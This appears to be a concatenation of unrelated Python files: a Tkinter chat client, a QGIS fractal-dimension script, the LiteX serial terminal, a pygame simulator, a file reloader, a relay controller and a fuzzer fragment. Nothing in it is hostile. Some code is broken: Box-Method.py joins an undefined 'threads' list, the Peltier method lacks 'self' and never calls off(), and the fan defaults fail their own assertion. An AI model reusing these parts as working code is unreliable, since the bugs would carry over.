self['bg'] = '#252525'
# Welcome label
welcomeLabel = Label(self, text='Welcome!',
font=('Lucida Grande', 44),
fg='#999999', bg='#252525')
welcomeLabel.pack(pady=50)
# Nickname label
nicknameLabel = Label(self, text='Nickname:',
fg='#999999', bg='#252525')
nicknameLabel.pack()
# Nickname entry
self.nicknameEntry = Entry(self, fg='#999999', bg='#353535')
self.nicknameEntry.pack()
# Login button
loginButton = Button(self, text='Login', command=self.getNickname,
width=16, height=1,
fg='#999999', bg='#353535', bd=3)
loginButton.pack()
# Warning label
self.warningLabel = Label(self, fg='#999999', bg='#252525')
self.warningLabel.pack(pady=30)
# LabelFrame pack
self.pack(padx=8, pady=8)
# Geting user nickname from entry
def getNickname(self):
global nickname
message = self.nicknameEntry.get()
if message == '':
self.warningLabel['text'] = 'Please, choose your nickname.'
elif len(message) < 4:
self.warningLabel['text'] = 'Too small nickname.'
elif len(message) > 20:
self.warningLabel['text'] = 'Too long nickname.'
else:
nickname = message
self.master.destroy()
################################################################################
class ChatRoom(LabelFrame):
def __init__(self, master, appName, nickname, serverIp, serverPort):
super().__init__(master)
# User nickname
self.nickname = nickname
# Server configuration
self.connected = False
self.serverIp = serverIp
self.serverPort = serverPort
self.server = None
# Tk configuration
self.master = master
self.master.geometry('800x550')
self.master.resizable(height=False, width=False)
self.master['bg'] = '#252525'
# LabelFrame configuration
self.appName = appName
self.config(text=self.appName)
self['fg'] = '#999999'
self['bg'] = '#252525'
# Chat
self.chatText = Text(self, width=95, height=27,
fg='#999999', bg='#454545',
bd=3, state=DISABLED)
self.chatText.pack(padx=5, pady=5, fill=BOTH, expand=1)
self.chatText.pack_propagate(False)
# Scrollbar
scrollBar = Scrollbar(self.chatText, command=self.chatText.yview)
scrollBar.pack(side='right', fill=Y)
self.chatText.config(yscrollcommand=scrollBar.set)
# Text box
self.textBox = Text(self, width=83, height=3,
fg='#999999', bg='#353535', bd=3)
self.textBox.pack(side='left', padx=5, pady=5)
# Enter button
enterButton = Button(self, text='ENTER', command=self.onEnter,
width=10, height=3,
fg='#999999', bg='#353535', bd=3)
enterButton.pack(side='right', padx=5, pady=5)
# LabelFrame pack
self.pack(padx=8, pady=8)
# Thread serverConnect
Thread(target=self.serverConnect, daemon=True).start()
# Insert message in chat
def chatInsert(self, message):
self.chatText['state'] = NORMAL
self.chatText.insert(INSERT, message)
self.chatText['state'] = DISABLED
self.chatText.see('end')
# Send message on press ENTER button
def onEnter(self):
message = self.textBox.get('1.0', END)
self.textBox.delete('1.0', END)
message = '{}: {}'.format(self.nickname, message)
self.chatInsert(message)
if self.connected:
self.server.send(message.replace('\n','').encode('utf8'))
# Connect to the server and receive messages
def serverConnect(self):
self.chatInsert('='*95 + '\n')
self.chatInsert('Welcome {}!\n'.format(self.nickname))
self.chatInsert('Trying to connect to the server.\n')
while True:
self.connectLoop()
self.chatInsert('Connected!\n')
self.chatInsert('='*95 + '\n')
sleep(1)
try:
self.server.send(self.nickname.encode('utf8'))
except:
self.chatInsert('='*95 + '\n')
self.chatInsert('Connection lost.\n')
self.connected = False
while self.connected:
try:
msg = self.server.recv(4096).decode('utf8')
self.chatInsert(msg + '\n')
except:
self.chatInsert('='*95 + '\n')
self.chatInsert('Connection lost.\n')
self.connected = False
def connectLoop(self):
self.server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
while True:
try:
self.server.connect((self.serverIp, self.serverPort))
self.connected = True
break
except:
self.chatInsert('Error when trying to connect to the server.\n')
sleep(1)
################################################################################
def main():
loginname = '+Login+'
chatname = '+ChatRoom+'
# If you want to use a PUBLIC IP, you need to configure your network.
SERVER_IP = '' # Paste your ip here
SERVER_PORT = 4444
login = Tk(className=loginname)
loginapp = Login(login, loginname)
loginapp.mainloop()
chatroom = Tk(className=chatname)
chatapp = ChatRoom(chatroom, chatname, nickname, SERVER_IP, SERVER_PORT)
chatapp.mainloop()
main()
|
Box-Method.py | # This PROGRAM calculates the fractal dimension of the coastline and border of India using the box counting method.
#
# The features/boxes of grid are distributed between the nodes and each node distributes features between its cores.
# At each core, the function : counter() is executed and results are stored in a Multiprocessing array and summated to get the count of boxes.
#
# The maps and shapefiles are taken from GADM (https://gadm.org/download_country_v3.html)
#
# Authors: Jaideep Reddy, Deepika Bisht (BML Munjal University Gurgaon, India)
#
# Last Modified:18-07-2021
#importing multiprocessing libraries
from timeit import default_timer as dt
import numpy as np
from multiprocessing import Process,Array,Value
#provide the following
cores = 18 # no of cores
nodes = 4 # no of nodes
gsize = 0.5 # grid size
node = 0 # node number
st = dt()
veckey = list(QgsProject.instance().mapLayers().keys())[1] # Get the key for map/india layer
instancelayer = QgsProject.instance().mapLayers()[veckey] # Use key to get the map/india layer
key = list(QgsProject.instance().mapLayers().keys())[0] # Get the key for grid layer
grid = QgsProject.instance().mapLayers()[key] # Use grid key to get the grid layer
# This function : counter() returns the count of boxes that contains a part of coastline / intersects with coastline.
def counter(gridfts,instvectors,arr,i):
cnt = 0
for feature in gridfts:
# Get the features of map within boundary of grid feature
areas = instvectors.getFeatures(QgsFeatureRequest().setFilterRect(feature.geometry().boundingBox()))
for area_feature in areas:
if feature.geometry().intersects(area_feature.geometry()): # if a map feature intersects with the grid feature count +1
cnt+=1
arr[i] = cnt # Store the count of intersections into Multiprocessing Array
gfeats = np.array(list(grid.getFeatures())) # Get the list of grid layer features
gsubs = np.array_split(gfeats,nodes) # Split the features list between the nodes
subs = np.array_split(gsubs[node],cores) # Take the features of current node and split them into no of cores
procs_list = []
arr = Array('i',range(cores)) # Create an Multiprocessing array to store results from each core
i=0
for sub in subs:
proc = Process(target=counter,args=(sub,instancelayer.clone(),arr,i)) # Create process to count the intersections
procs_list.append(proc) # Add process to the procs_list
proc.start() # Start process
i+=1
for proc in threads:
proc.join() # Wait till all processes ends (join)
count = 0 # count of intersections
for x in arr:
count+=x # Sum all intersection counts from all cores
ctime = dt()-st
# Write the results
f = open("//home//qgis//indiaresults.txt","a+")
f.write("grid size : "+str(gsize)+"\n")
f.write("node : "+str(node)+"\n")
f.write("count : "+str(count)+"\n")
f.write("time : "+str(ctime)+"\n\n")
f.close()
|
litex_term.py | #!/usr/bin/env python3
#
# This file is part of LiteX.
#
# Copyright (c) 2015-2020 Florent Kermarrec <florent@enjoy-digital.fr>
# Copyright (c) 2015 Sebastien Bourdeauducq <sb@m-labs.hk>
# Copyright (c) 2016 whitequark <whitequark@whitequark.org>
# SPDX-License-Identifier: BSD-2-Clause
import sys
import signal
import os
import time
import serial
import threading
import multiprocessing
import argparse
import json
import socket
# Console ------------------------------------------------------------------------------------------
if sys.platform == "win32":
import ctypes
import msvcrt
class Console:
def configure(self):
# https://stackoverflow.com/a/36760881
# ENABLE_VIRTUAL_TERMINAL_PROCESSING
kernel32 = ctypes.windll.kernel32
kernel32.SetConsoleMode(kernel32.GetStdHandle(-11), 7)
def unconfigure(self):
pass
def getkey(self):
return msvcrt.getch()
# getch doesn't return Virtual Keycodes, but rather
# PS/2 Scan Codes. Keycodes starting with 0xE0 are
# worth handling.
def escape_char(self, b):
return b == b"\xe0"
def handle_escape(self, b):
return {
b"H" : b"\x1b[A", # Up
b"P" : b"\x1b[B", # Down
b"K" : b"\x1b[D", # Left
b"M" : b"\x1b[C", # Right
b"G" : b"\x1b[H", # Home
b"O" : b"\x1b[F", # End
b"R" : b"\x1b[2~", # Insert
b"S" : b"\x1b[3~", # Delete
}.get(b, None) # TODO: Handle ESC? Others?
else:
import termios
import pty
class Console:
def __init__(self):
self.fd = sys.stdin.fileno()
self.default_settings = termios.tcgetattr(self.fd)
def configure(self):
settings = termios.tcgetattr(self.fd)
settings[3] = settings[3] & ~termios.ICANON & ~termios.ECHO
settings[6][termios.VMIN] = 1
settings[6][termios.VTIME] = 0
termios.tcsetattr(self.fd, termios.TCSANOW, settings)
def unconfigure(self):
termios.tcsetattr(self.fd, termios.TCSAFLUSH, self.default_settings)
def getkey(self):
return os.read(self.fd, 1)
def escape_char(self, b):
return False
def handle_escape(self, b):
return None
# Crossover UART -------------------------------------------------------------------------------------
from litex import RemoteClient
class CrossoverUART:
def __init__(self, name="uart_xover", host="localhost", base_address=None, csr_csv=None):
self.bus = RemoteClient(host=host, base_address=base_address, csr_csv=csr_csv)
present = False
for k, v in self.bus.regs.d.items():
if f"{name}_" in k:
setattr(self, k.replace(f"{name}_", ""), v)
present = True
if not present:
raise ValueError(f"CrossoverUART {name} not present in design.")
# FIXME: On PCIe designs, CSR is remapped to 0 to limit BAR0 size.
if base_address is None and hasattr(self.bus.bases, "pcie_phy"):
self.bus.base_address = -self.bus.mems.csr.base
def open(self):
self.bus.open()
self.file, self.name = pty.openpty()
self.pty2crossover_thread = multiprocessing.Process(target=self.pty2crossover)
self.crossover2pty_thread = multiprocessing.Process(target=self.crossover2pty)
self.pty2crossover_thread.start()
self.crossover2pty_thread.start()
def close(self):
self.bus.close()
self.pty2crossover_thread.terminate()
self.crossover2pty_thread.terminate()
def pty2crossover(self):
while True:
r = os.read(self.file, 1)
self.rxtx.write(ord(r))
def crossover2pty(self):
while True:
if self.rxfull.read():
length = 16
elif not self.rxempty.read():
length = 1
else:
time.sleep(1e-3)
continue
r = self.bus.read(self.rxtx.addr, length=length, burst="fixed")
for v in r:
os.write(self.file, bytes(chr(v).encode("utf-8")))
# JTAG UART ----------------------------------------------------------------------------------------
from litex.build.openocd import OpenOCD
class JTAGUART:
def __init__(self, config="openocd_xc7_ft2232.cfg", port=20000, chain=1):
self.config = config
self.port = port
self.chain = chain
def open(self):
self.file, self.name = pty.openpty()
self.jtag2tcp_thread = multiprocessing.Process(target=self.jtag2tcp)
self.jtag2tcp_thread.start()
time.sleep(0.5)
self.pty2tcp_thread = multiprocessing.Process(target=self.pty2tcp)
self.tcp2pty_thread = multiprocessing.Process(target=self.tcp2pty)
self.tcp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.tcp.connect(("localhost", self.port))
self.pty2tcp_thread.start()
self.tcp2pty_thread.start()
def close(self):
self.jtag2tcp_thread.terminate()
self.pty2tcp_thread.terminate()
self.tcp2pty_thread.terminate()
def jtag2tcp(self):
prog = OpenOCD(self.config)
prog.stream(self.port, self.chain)
def pty2tcp(self):
while True:
r = os.read(self.file, 1)
self.tcp.send(r)
def tcp2pty(self):
while True:
r = self.tcp.recv(1)
os.write(self.file, bytes(r))
# Intel/Altera JTAG UART via nios2-terminal
class Nios2Terminal():
def __init__(self):
from subprocess import Popen, PIPE
p = Popen("nios2-terminal", stdin=PIPE, stdout=PIPE)
self.p = p
def read(self):
return self.p.stdout.read(1)
def in_waiting(self):
# unfortunately p.stdout does not provide
# information about awaiting input
return False
def write(self, data):
if data is not None:
self.p.stdin.write(data)
try:
self.p.stdin.flush()
except BrokenPipeError:
print("nios2-terminal has terminated, exiting...\n")
sys.exit(1)
def close(self):
self.p.terminate()
# SFL ----------------------------------------------------------------------------------------------
sfl_prompt_req = b"F7: boot from serial\n"
sfl_prompt_ack = b"\x06"
sfl_magic_req = b"sL5DdSMmkekro\n"
sfl_magic_ack = b"z6IHG7cYDID6o\n"
sfl_payload_length = 255
# General commands
sfl_cmd_abort = b"\x00"
sfl_cmd_load = b"\x01"
sfl_cmd_jump = b"\x02"
# Replies
sfl_ack_success = b"K"
sfl_ack_crcerror = b"C"
sfl_ack_unknown = b"U"
sfl_ack_error = b"E"
class SFLFrame:
def __init__(self):
self.cmd = bytes()
self.payload = bytes()
def compute_crc(self):
return crc16(self.cmd + self.payload)
def encode(self):
packet = bytes([len(self.payload)])
packet += self.compute_crc().to_bytes(2, "big")
packet += self.cmd
packet += self.payload
return packet
# CRC16 --------------------------------------------------------------------------------------------
crc16_table = [
0x0000, 0x1021, 0x2042, 0x3063, 0x4084, 0x50A5, 0x60C6, 0x70E7,
0x8108, 0x9129, 0xA14A, 0xB16B, 0xC18C, 0xD1AD, 0xE1CE, 0xF1EF,
0x1231, 0x0210, 0x3273, 0x2252, 0x52B5, 0x4294, 0x72F7, 0x62D6,
0x9339, 0x8318, 0xB37B, 0xA35A, 0xD3BD, 0xC39C, 0xF3FF, 0xE3DE,
0x2462, 0x3443, 0x0420, 0x1401, 0x64E6, 0x74C7, 0x44A4, 0x5485,
0xA56A, 0xB54B, 0x8528, 0x9509, 0xE5EE, 0xF5CF, 0xC5AC, 0xD58D,
0x3653, 0x2672, 0x1611, 0x0630, 0x76D7, 0x66F6, 0x5695, 0x46B4,
0xB75B, 0xA77A, 0x9719, 0x8738, 0xF7DF, 0xE7FE, 0xD79D, 0xC7BC,
0x48C4, 0x58E5, 0x6886, 0x78A7, 0x0840, 0x1861, 0x2802, 0x3823,
0xC9CC, 0xD9ED, 0xE98E, 0xF9AF, 0x8948, 0x9969, 0xA90A, 0xB92B,
0x5AF5, 0x4AD4, 0x7AB7, 0x6A96, 0x1A71, 0x0A50, 0x3A33, 0x2A12,
0xDBFD, 0xCBDC, 0xFBBF, 0xEB9E, 0x9B79, 0x8B58, 0xBB3B, 0xAB1A,
0x6CA6, 0x7C87, 0x4CE4, 0x5CC5, 0x2C22, 0x3C03, 0x0C60, 0x1C41,
0xEDAE, 0xFD8F, 0xCDEC, 0xDDCD, 0xAD2A, 0xBD0B, 0x8D68, 0x9D49,
0x7E97, 0x6EB6, 0x5ED5, 0x4EF4, 0x3E13, 0x2E32, 0x1E51, 0x0E70,
0xFF9F, 0xEFBE, 0xDFDD, 0xCFFC, 0xBF1B, 0xAF3A, 0x9F59, 0x8F78,
0x9188, 0x81A9, 0xB1CA, 0xA1EB, 0xD10C, 0xC12D, 0xF14E, 0xE16F,
0x1080, 0x00A1, 0x30C2, 0x20E3, 0x5004, 0x4025, 0x7046, 0x6067,
0x83B9, 0x9398, 0xA3FB, 0xB3DA, 0xC33D, 0xD31C, 0xE37F, 0xF35E,
0x02B1, 0x1290, 0x22F3, 0x32D2, 0x4235, 0x5214, 0x6277, 0x7256,
0xB5EA, 0xA5CB, 0x95A8, 0x8589, 0xF56E, 0xE54F, 0xD52C, 0xC50D,
0x34E2, 0x24C3, 0x14A0, 0x0481, 0x7466, 0x6447, 0x5424, 0x4405,
0xA7DB, 0xB7FA, 0x8799, 0x97B8, 0xE75F, 0xF77E, 0xC71D, 0xD73C,
0x26D3, 0x36F2, 0x0691, 0x16B0, 0x6657, 0x7676, 0x4615, 0x5634,
0xD94C, 0xC96D, 0xF90E, 0xE92F, 0x99C8, 0x89E9, 0xB98A, 0xA9AB,
0x5844, 0x4865, 0x7806, 0x6827, 0x18C0, 0x08E1, 0x3882, 0x28A3,
0xCB7D, 0xDB5C, 0xEB3F, 0xFB1E, 0x8BF9, 0x9BD8, 0xABBB, 0xBB9A,
0x4A75, 0x5A54, 0x6A37, 0x7A16, 0x0AF1, 0x1AD0, 0x2AB3, 0x3A92,
0xFD2E, 0xED0F, 0xDD6C, 0xCD4D, 0xBDAA, 0xAD8B, 0x9DE8, 0x8DC9,
0x7C26, 0x6C07, 0x5C64, 0x4C45, 0x3CA2, 0x2C83, 0x1CE0, 0x0CC1,
0xEF1F, 0xFF3E, 0xCF5D, 0xDF7C, 0xAF9B, 0xBFBA, 0x8FD9, 0x9FF8,
0x6E17, 0x7E36, 0x4E55, 0x5E74, 0x2E93, 0x3EB2, 0x0ED1, 0x1EF0
]
def crc16(l):
crc = 0
for d in l:
crc = crc16_table[((crc >> 8) ^ d) & 0xff] ^ (crc << 8)
return crc & 0xffff
# LiteXTerm ----------------------------------------------------------------------------------------
class LiteXTerm:
def __init__(self, serial_boot, kernel_image, kernel_address, json_images, safe):
self.serial_boot = serial_boot
assert not (kernel_image is not None and json_images is not None)
self.mem_regions = {}
if kernel_image is not None:
self.mem_regions = {kernel_image: kernel_address}
self.boot_address = kernel_address
if json_images is not None:
f = open(json_images, "r")
json_dir = os.path.dirname(json_images)
for k, v in json.load(f).items():
self.mem_regions[os.path.join(json_dir, k)] = v
self.boot_address = self.mem_regions[list(self.mem_regions.keys())[-1]]
f.close()
self.reader_alive = False
self.writer_alive = False
self.prompt_detect_buffer = bytes(len(sfl_prompt_req))
self.magic_detect_buffer = bytes(len(sfl_magic_req))
self.console = Console()
signal.signal(signal.SIGINT, self.sigint)
self.sigint_time_last = 0
self.safe = safe
self.delay = 0
self.length = 64
self.outstanding = 0 if safe else 128
def open(self, port, baudrate):
if hasattr(self, "port"):
return
self.port = serial.serial_for_url(port, baudrate)
def close(self):
if not hasattr(self, "port"):
return
self.port.close()
del self.port
def sigint(self, sig, frame):
if hasattr(self, "port"):
self.port.write(b"\x03")
sigint_time_current = time.time()
# Exit term if 2 CTRL-C pressed in less than 0.5s.
if (sigint_time_current - self.sigint_time_last < 0.5):
self.console.unconfigure()
self.close()
sys.exit()
else:
self.sigint_time_last = sigint_time_current
def send_frame(self, frame):
retry = 1
while retry:
self.port.write(frame.encode())
# Get the reply from the device
reply = self.port.read()
if reply == sfl_ack_success:
retry = 0
elif reply == sfl_ack_crcerror:
retry = 1
else:
print("[LITEX-TERM] Got unknown reply '{}' from the device, aborting.".format(reply))
return 0
return 1
def receive_upload_response(self):
reply = self.port.read()
if reply == sfl_ack_success:
return True
elif reply == sfl_ack_crcerror:
print("[LITEX-TERM] Upload to device failed due to data corruption (CRC error)")
else:
print(f"[LITEX-TERM] Got unexpected response from device '{reply}'")
sys.exit(1)
def upload_calibration(self, address):
print("[LITEX-TERM] Upload calibration... ", end="")
sys.stdout.flush()
# Calibration parameters.
min_delay = 1e-5
max_delay = 1e-3
nframes = 16
length_range = [64]
# Run calibration with increasing delay and decreasing length.
delay = min_delay
working_delay = None
working_length = None
while delay <= max_delay:
for length in length_range:
#p0rint(f"delay {delay}, length {length}")
# Prepare frame.
frame = SFLFrame()
frame.cmd = sfl_cmd_load
frame_data = bytearray(min(length, sfl_payload_length-4))
frame.payload = address.to_bytes(4, "big")
frame.payload += frame_data
frame = frame.encode()
# Send N consecutive frames.
for i in range(nframes):
self.port.write(frame)
time.sleep(delay)
# Wait and get acks.
working = True
time.sleep(0.2)
while self.port.in_waiting:
ack = self.port.read()
#print(ack)
if ack in [sfl_ack_error, sfl_ack_crcerror]:
working = False
if working:
# Save working delay/length and exit.
working_delay = delay
working_length = min(length, sfl_payload_length - 4)
break
# Exit if working delay found.
if (working_delay is not None):
break
# Else increase delay.
delay = delay*2
# Set parameters.
if (working_delay is not None):
print(f"(inter-frame: {working_delay*1e6:5.2f}us, length: {working_length})")
self.delay = working_delay
self.length = working_length
else:
print("failed, switching to --safe mode.")
self.delay = 0
self.length = 64
self.outstanding = 0
def upload(self, filename, address):
f = open(filename, "rb")
f.seek(0, 2)
length = f.tell()
f.seek(0, 0)
print(f"[LITEX-TERM] Uploading {filename} to 0x{address:08x} ({length} bytes)...")
# Upload calibration
if not self.safe:
self.upload_calibration(address)
# Force safe mode settings when calibration fails.
if self.delay is None:
self.delay = 0
self.length = 64
self.outstanding = 0
# Prepare parameters
current_address = address
position = 0
start = time.time()
remaining = length
outstanding = 0
while remaining:
# Show progress
sys.stdout.write("|{}>{}| {}%\r".format(
"=" * (20*position//length),
" " * (20-20*position//length),
100*position//length))
sys.stdout.flush()
# Send frame if max outstanding not reached.
if outstanding <= self.outstanding:
# Prepare frame.
frame = SFLFrame()
frame.cmd = sfl_cmd_load
frame_data = f.read(min(remaining, self.length-4))
frame.payload = current_address.to_bytes(4, "big")
frame.payload += frame_data
# Encode frame and send it.
self.port.write(frame.encode())
# Update parameters
current_address += len(frame_data)
position += len(frame_data)
remaining -= len(frame_data)
outstanding += 1
# Inter-frame delay.
time.sleep(self.delay)
# Read response if available.
while self.port.in_waiting:
ack = self.receive_upload_response()
if ack:
outstanding -= 1
break
# Get remaining responses.
for _ in range(outstanding):
self.receive_upload_response()
# Compute speed.
end = time.time()
elapsed = end - start
print("[LITEX-TERM] Upload complete ({0:.1f}KB/s).".format(length/(elapsed*1024)))
f.close()
return length
def boot(self):
print("[LITEX-TERM] Booting the device.")
frame = SFLFrame()
frame.cmd = sfl_cmd_jump
frame.payload = int(self.boot_address, 16).to_bytes(4, "big")
self.send_frame(frame)
def detect_prompt(self, data):
if len(data):
self.prompt_detect_buffer = self.prompt_detect_buffer[1:] + data
return self.prompt_detect_buffer == sfl_prompt_req
else:
return False
def answer_prompt(self):
print("[LITEX-TERM] Received serial boot prompt from the device.")
self.port.write(sfl_prompt_ack)
def detect_magic(self, data):
if len(data):
self.magic_detect_buffer = self.magic_detect_buffer[1:] + data
return self.magic_detect_buffer == sfl_magic_req
else:
return False
def answer_magic(self):
print("[LITEX-TERM] Received firmware download request from the device.")
if(len(self.mem_regions)):
self.port.write(sfl_magic_ack)
for filename, base in self.mem_regions.items():
self.upload(filename, int(base, 16))
self.boot()
print("[LITEX-TERM] Done.")
def reader(self):
try:
while self.reader_alive:
c = self.port.read()
sys.stdout.buffer.write(c)
sys.stdout.flush()
if len(self.mem_regions):
if self.serial_boot and self.detect_prompt(c):
self.answer_prompt()
if self.detect_magic(c):
self.answer_magic()
except serial.SerialException:
self.reader_alive = False
self.console.unconfigure()
raise
def start_reader(self):
self.reader_alive = True
self.reader_thread = threading.Thread(target=self.reader)
self.reader_thread.setDaemon(True)
self.reader_thread.start()
def stop_reader(self):
self.reader_alive = False
self.reader_thread.join()
def writer(self):
try:
while self.writer_alive:
b = self.console.getkey()
if b == b"\x03":
self.stop()
elif b == b"\n":
self.port.write(b"\x0a")
elif self.console.escape_char(b):
b = self.console.getkey()
ansi_seq = self.console.handle_escape(b)
self.port.write(ansi_seq)
else:
self.port.write(b)
except:
self.writer_alive = False
self.console.unconfigure()
raise
def start_writer(self):
self.writer_alive = True
self.writer_thread = threading.Thread(target=self.writer)
self.writer_thread.setDaemon(True)
self.writer_thread.start()
def stop_writer(self):
self.writer_alive = False
self.writer_thread.join()
def start(self):
self.start_reader()
self.start_writer()
def stop(self):
self.reader_alive = False
self.writer_alive = False
def join(self, writer_only=False):
self.writer_thread.join()
if not writer_only:
self.reader_thread.join()
# Run ----------------------------------------------------------------------------------------------
def _get_args():
parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument("port", help="Serial port (eg /dev/tty*, crossover, jtag).")
parser.add_argument("--speed", default=115200, help="Serial baudrate.")
parser.add_argument("--serial-boot", default=False, action='store_true', help="Automatically initiate serial boot.")
parser.add_argument("--kernel", default=None, help="Kernel image.")
parser.add_argument("--kernel-adr", default="0x40000000", help="Kernel address.")
parser.add_argument("--images", default=None, help="JSON description of the images to load to memory.")
parser.add_argument("--safe", action="store_true", help="Safe serial boot mode, disable upload speed optimizations.")
parser.add_argument("--csr-csv", default=None, help="SoC CSV file.")
parser.add_argument("--base-address", default=None, help="CSR base address.")
parser.add_argument("--crossover-name", default="uart_xover", help="Crossover UART name to use (present in design/csr.csv).")
parser.add_argument("--jtag-name", default="jtag_uart", help="JTAG UART type (jtag_uart).")
parser.add_argument("--jtag-config", default="openocd_xc7_ft2232.cfg", help="OpenOCD JTAG configuration file for jtag_uart.")
parser.add_argument("--jtag-chain", default=1, help="JTAG chain.")
return parser.parse_args()
def main():
args = _get_args()
term = LiteXTerm(args.serial_boot, args.kernel, args.kernel_adr, args.images, args.safe)
if sys.platform == "win32":
if args.port in ["crossover", "jtag"]:
raise NotImplementedError
if args.port in ["crossover"]:
base_address = None if args.base_address is None else int(args.base_address)
xover = CrossoverUART(base_address=base_address, csr_csv=args.csr_csv, name=args.crossover_name)
xover.open()
port = os.ttyname(xover.name)
elif args.port in ["jtag"]:
if args.jtag_name == "jtag_uart":
jtag_uart = JTAGUART(config=args.jtag_config, chain=int(args.jtag_chain))
jtag_uart.open()
port = os.ttyname(jtag_uart.name)
else:
raise NotImplementedError
else:
port = args.port
term.open(port, int(float(args.speed)))
term.console.configure()
term.start()
term.join(True)
if __name__ == "__main__":
main()
|
simulator.py | import threading
import pygame
from .arenas import TCRArena
from .display import Display
DEFAULT_GAME = 'tin-can-rally'
GAMES = {'tin-can-rally': TCRArena,
}
class Simulator(object):
def __init__(self, config=None, size=(8, 8), frames_per_second=30, background=True):
if config is None:
config = dict()
try:
game_name = config['game']
del config['game']
except KeyError:
game_name = DEFAULT_GAME
game = GAMES[game_name]
self.arena = game(**config)
self.display = Display(self.arena)
self.background = background
self.frames_per_second = frames_per_second
if self.background:
self._loop_thread = threading.Thread(
target=self._main_loop, args=(frames_per_second,))
self._loop_thread.setDaemon(True)
self._loop_thread.start()
def run(self):
if self.background:
raise RuntimeError(
'Simulator runs in the background. Try passing background=False')
self._main_loop(self.frames_per_second)
def _main_loop(self, frames_per_second):
clock = pygame.time.Clock()
while True:
if any(event.type == pygame.QUIT
or (event.type == pygame.KEYDOWN and event.key == pygame.K_ESCAPE)
for event in pygame.event.get()):
break
self.display.tick(1 / frames_per_second)
clock.tick(frames_per_second)
pygame.quit()
|
statreload.py | import multiprocessing
import os
import signal
import sys
import time
from pathlib import Path
HANDLED_SIGNALS = (
signal.SIGINT, # Unix signal 2. Sent by Ctrl+C.
signal.SIGTERM, # Unix signal 15. Sent by `kill <pid>`.
)
class StatReload:
def __init__(self, config):
self.config = config
self.should_exit = False
self.reload_count = 0
self.mtimes = {}
def handle_exit(self, sig, frame):
self.should_exit = True
@staticmethod
def handle_fds(target, fd_stdin, **kwargs):
"""Handle stdin in subprocess for pdb."""
sys.stdin = os.fdopen(fd_stdin)
target(**kwargs)
def run(self, target, *args, **kwargs):
pid = os.getpid()
logger = self.config.logger_instance
logger.info("Started reloader process [{}]".format(pid))
for sig in HANDLED_SIGNALS:
signal.signal(sig, self.handle_exit)
def get_subprocess():
spawn = multiprocessing.get_context("spawn")
return spawn.Process(
target=self.handle_fds, args=(target, sys.stdin.fileno()), kwargs=kwargs
)
process = get_subprocess()
process.start()
while process.is_alive() and not self.should_exit:
time.sleep(0.3)
if self.should_restart():
self.clear()
os.kill(process.pid, signal.SIGTERM)
process.join()
process = get_subprocess()
process.start()
self.reload_count += 1
logger.info("Stopping reloader process [{}]".format(pid))
def clear(self):
self.mtimes = {}
def should_restart(self):
for filename in self.iter_py_files():
try:
mtime = os.stat(filename).st_mtime
except OSError as exc: # pragma: nocover
continue
old_time = self.mtimes.get(filename)
if old_time is None:
self.mtimes[filename] = mtime
continue
elif mtime > old_time:
display_path = os.path.normpath(filename)
if Path.cwd() in Path(filename).parents:
display_path = os.path.normpath(os.path.relpath(filename))
message = "Detected file change in '%s'. Reloading..."
self.config.logger_instance.warning(message, display_path)
return True
return False
def iter_py_files(self):
for reload_dir in self.config.reload_dirs:
for subdir, dirs, files in os.walk(reload_dir):
for file in files:
filepath = subdir + os.sep + file
if filepath.endswith(".py"):
yield filepath
|
managerHardware.py | from backendRelay import Relay
from backendTimerUtils import IndefiniteTimer, time_in_range
from threading import Thread
from time import sleep
from statistics import mean
import datetime
class Lights(Relay):
def __init__(self, relaystring, gpiomanager, camera):
super(Lights, self).__init__(relaystring, "Lights", gpiomanager)
self.camera = camera
def inrangeON(self):
timenow = datetime.datetime.now().time()
# print("Light function ran at {}".format(timenow))
if time_in_range(self.ton, self.toff, timenow):
self.camera.sentinel = True
if not self.ison:
self.on()
else:
self.camera.sentinel = False
if self.ison:
self.off()
def startscheduledlighting(self, ton = (8, 0), toff = (22, 0)):
self.ton = datetime.time(*ton)
self.toff = datetime.time(*toff)
# every ten seconds, check if in desired time window for lights on
self.lightschedule = IndefiniteTimer(10, self.inrangeON)
self.lightschedulethread = Thread(target = self.lightschedule.start_all)
self.lightschedulethread.start()
class Mister(Relay):
def __init__(self, relaystring, gpiomanager):
super(Mister, self).__init__(relaystring, "Mister", gpiomanager)
def onemistingcycle(self):
self.on()
for i in range(10*self.forNsec):
if self.misterschedule.sentinel:
sleep(0.1)
else:
break
self.off()
def startscheduledmisting(self, everyNsec = 60, forNsec = 25):
assert everyNsec > forNsec, "Time misting must be less than time between misting cycles."
self.everyNsec = everyNsec
self.forNsec = forNsec
# everyNsec mist forNsec
self.misterschedule = IndefiniteTimer(self.everyNsec, self.onemistingcycle)
self.misterschedulethread = Thread(target = self.misterschedule.start_all)
self.misterschedulethread.start()
class Fan(Relay):
def __init__(self, relaystring, gpiomanager):
super(Fan, self).__init__(relaystring, "Fan", gpiomanager)
def onefancycle(self):
self.on()
for i in range(10*self.forNsec):
if self.fanschedule.sentinel:
sleep(0.1)
else:
break
self.off()
def startscheduledfanning(self, everyNsec = 1, forNsec = 45):
assert everyNsec > forNsec, "Time fanning must be less than time between fan cycles."
self.everyNsec = everyNsec
self.forNsec = forNsec
# everyNsec fan forNsec
self.fanschedule = IndefiniteTimer(self.everyNsec, self.onefancycle)
self.fanschedulethread = Thread(target = self.fanschedule.start_all)
self.fanschedulethread.start()
class Peltier(Relay):
def __init__(self, relaystring, gpiomanager, ontemp = 20, bufferlen = 10):
super(Peltier, self).__init__(relaystring, "Peltier", gpiomanager)
self.bufferlen = bufferlen
self.bufferindex = 0
self.circlebuffer = [0]*self.bufferlen
self.ontemp = ontemp
def updatefromtemp(rtemp):
self.circlebuffer[self.bufferindex%self.bufferlen] = rtemp
self.bufferindex += 1
if mean(self.circlebuffer) > self.ontemp:
self.on()
else:
self.off
|
gene.py | from dataclasses import is_dataclass
from random import choice, randint, random, sample, shuffle
from time import time
from multiprocessing import Process, Manager
from tzer.error import MaybeDeadLoop, RuntimeFailure
from tzer.template import execute_both_mode
from tzer.seed_eval import SimpleLSTMEvaluator
from tzer.context import _RELAY_FUNCTION_HARD_PASSES_
try:
from tvm.contrib import coverage
except Exception as e:
print(f'No coverage in linked TVM. {e}')
class Genes:
def __init__(self, genes, other_genes=[]):
self.genes = genes
self.other_genes = other_genes
def other_genes(self, other_genes):
self.other_genes = other_genes
def new(self):
possible_genes = self.genes + self.other_genes
